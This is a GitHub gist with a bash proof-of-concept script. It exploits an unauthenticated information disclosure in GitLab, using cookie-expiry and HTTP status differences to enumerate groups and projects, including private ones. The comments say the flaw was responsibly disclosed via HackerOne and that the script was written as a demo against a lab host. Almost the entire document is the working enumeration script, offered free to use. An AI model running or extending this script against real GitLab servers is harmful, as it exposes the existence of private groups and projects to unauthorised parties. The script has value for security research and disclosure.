Last active
April 7, 2022 12:11
-
-
Save TheGroundZero/ea067760fd6c3854238f098cb075bf96 to your computer and use it in GitHub Desktop.
Unauthenticated Information Disclosure in Gitlab allows for enumeration/bruteforce of groups and projects
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Script by TheGroundZero (@DezeStijn) | |
# | |
# https://sequr.be/blog/2020/06/gitlab-unauthenticated-group-and-project-enumeration/ | |
# https://gist.github.com/TheGroundZero/ea067760fd6c3854238f098cb075bf96 | |
# | |
# Using a difference in behaviour by Gitlab in setting cookies | |
# it's possible to enumerate/bruteforce groups/projects | |
# as an unauthenticated user. | |
# | |
# This code was written purely for a demo. | |
# With some reworking this could work with wordlist files | |
# and even be multithreaded. | |
# | |
# Responsibly disclosed to Gitlab via HackerOne on 2020-06-04 | |
# https://hackerone.com/reports/891055 | |
# | |
# Free to use, but please do refer to this original gist. | |
# | |
# https://github.com/TheGroundZero | |
# https://twitter.com/DezeStijn/ | |
# https://sequr.be/ | http://sequrx53bdtvizjsbcdibrugpg7fujhvx7b75rvhwh2kq3i4hhvh35qd.onion/ | |
# | |
groups="root grouppublic groupinternal groupprivate" | |
projects="projectpublic projectinternal projectprivate" | |
url="http://gitlab.lab.local" | |
print_exists() { | |
if [ $1 -eq 1 ]; then | |
echo -e "\e[92m[+]\e[0m $2" | |
else | |
echo -e "\e[91m[-]\e[0m $2" | |
fi | |
} | |
check_cookie() { | |
status=`curl -s -o /dev/null -w "%{http_code}" "$1"` | |
#echo "[i] HTTP code = $status" | |
if [ $status -eq 200 ]; then | |
print_exists 1 $1 | |
else | |
expire=`curl --junk-session-cookies --cookie-jar - "$1" 2>/dev/null | awk '/_gitlab_session/ {print $5}'` | |
#echo "[i] Expire = $expire" | |
if [ $expire -gt 0 ]; then | |
print_exists 0 $1 | |
else | |
print_exists 1 $1 | |
fi | |
fi | |
} | |
for group in $groups; do | |
echo "[*] Group: $group" | |
#echo "[*] Testing: $url/$group" | |
check_cookie "$url/$group" | |
for project in $projects; do | |
echo "[*] Project: $project" | |
#echo "[*] Testing: $url/$group/$project" | |
check_cookie "$url/$group/$project" | |
done | |
echo "" | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment